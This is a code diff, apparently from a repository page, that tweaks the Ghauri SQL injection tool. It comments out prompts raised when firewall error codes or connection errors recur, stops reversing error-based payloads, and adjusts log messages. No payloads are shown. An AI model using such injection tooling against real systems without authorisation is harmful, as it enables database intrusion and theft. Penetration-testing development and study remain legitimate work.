     1327 + break
     1328 + if is_length_found:
    1313 1329   break
    1314  - if is_length_found:
    1315  - break
    1316 1330   return length
    1317 1331   
    1318 1332   def fetch_using_error_based_vector(
    skipped 54 lines
    1373 1387   if error_based_in_vectors:
    1374 1388   vector = conf.vectors.get("error_vector")
    1375 1389   while start < end:
    1376  - if http_firewall_code_counter > 2:
    1377  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    1378  - logger.warning(f"HTTP error code detected during run:")
    1379  - choice = logger.read_input(
    1380  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    1381  - batch=False,
    1382  - user_input="C",
    1383  - )
    1384  - if choice == "q":
    1385  - logger.error("user quit")
    1386  - logger.end("ending")
    1387  - exit(0)
    1388  - if choice == "c":
    1389  - http_firewall_code_counter = 0
    1390  - if retry_on_error >= retry:
    1391  - logger.warning(f"Ghauri detected connection errors multiple times")
    1392  - choice = logger.read_input(
    1393  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    1394  - batch=False,
    1395  - user_input="C",
    1396  - )
    1397  - if choice == "q":
    1398  - logger.error("user quit")
    1399  - logger.end("ending")
    1400  - exit(0)
    1401  - if choice == "c":
    1402  - retry_on_error = 0
     1390 + # if http_firewall_code_counter > 2:
     1391 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     1392 + # logger.warning(f"HTTP error code detected during run:")
     1393 + # choice = logger.read_input(
     1394 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     1395 + # batch=False,
     1396 + # user_input="C",
     1397 + # )
     1398 + # if choice == "q":
     1399 + # logger.error("user quit")
     1400 + # logger.end("ending")
     1401 + # exit(0)
     1402 + # if choice == "c":
     1403 + # http_firewall_code_counter = 0
     1404 + # if retry_on_error >= retry:
     1405 + # logger.warning(f"Ghauri detected connection errors multiple times")
     1406 + # choice = logger.read_input(
     1407 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     1408 + # batch=False,
     1409 + # user_input="C",
     1410 + # )
     1411 + # if choice == "q":
     1412 + # logger.error("user quit")
     1413 + # logger.end("ending")
     1414 + # exit(0)
     1415 + # if choice == "c":
     1416 + # retry_on_error = 0
    1403 1417   entry = payloads[start]
    1404 1418   response_string = ""
    1405 1419   if delay > 0:
    skipped 259 lines
    1665 1679   vector_type=vector_type,
    1666 1680   )
    1667 1681   if length == 0:
    1668  - logger.debug(
     1682 + logger.warning(
    1669 1683   "it was not possible to extract query output length for the SQL query provided."
    1670 1684   )
    1671 1685   continue
    skipped 655 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/tests.py
    skipped 665 lines
    666 666   with_status_code = attack.status_code
    667 667   if attack.status_code != attack01.status_code:
    668 668   is_different_status_code_injectable = True
    669  - with_status_code_msg = f" (with --code={with_status_code})"
     669 + if attack.status_code != 200:
     670 + with_status_code_msg = f" (with --code={with_status_code})"
    670 671   if attack.status_code in [403, 406]:
    671 672   logger.debug(
    672 673   f"{attack.error_msg} HTTP error codes detected. ghauri is going to retry in few seconds.."
    skipped 481 lines
    1154 1155   f" (with error ReadTimeout on --timeout={timeout})"
    1155 1156   )
    1156 1157   else:
    1157  - with_status_code_msg = f" (with --code={with_status_code})"
     1158 + if attack.status_code != 200:
     1159 + with_status_code_msg = f" (with --code={with_status_code})"
    1158 1160   if attack.status_code in [403, 406] and code and code not in [403, 406]:
    1159 1161   logger.debug(
    1160 1162   f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    skipped 138 lines
    1299 1301   error_based_payloads = get_payloads_with_functions(
    1300 1302   error_based_payloads, backend=dbms, possible_dbms=possible_dbms
    1301 1303   )
    1302  - error_based_payloads.reverse()
     1304 + # error_based_payloads.reverse()
    1303 1305   for entry in error_based_payloads:
    1304 1306   backend = entry.dbms
    1305 1307   index_of_payload = 0
    skipped 108 lines
    1414 1416   with_status_code = attack.status_code
    1415 1417   if attack.status_code != base.status_code:
    1416 1418   is_different_status_code_injectable = True
    1417  - with_status_code_msg = f" (with --code={with_status_code})"
     1419 + if attack.status_code != 200:
     1420 + with_status_code_msg = f" (with --code={with_status_code})"
    1418 1421   if attack.status_code in [403, 406] and code and code not in [403, 406]:
    1419 1422   logger.critical(
    1420 1423   f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    skipped 1105 lines
Please wait...
Page is in error, reload to recover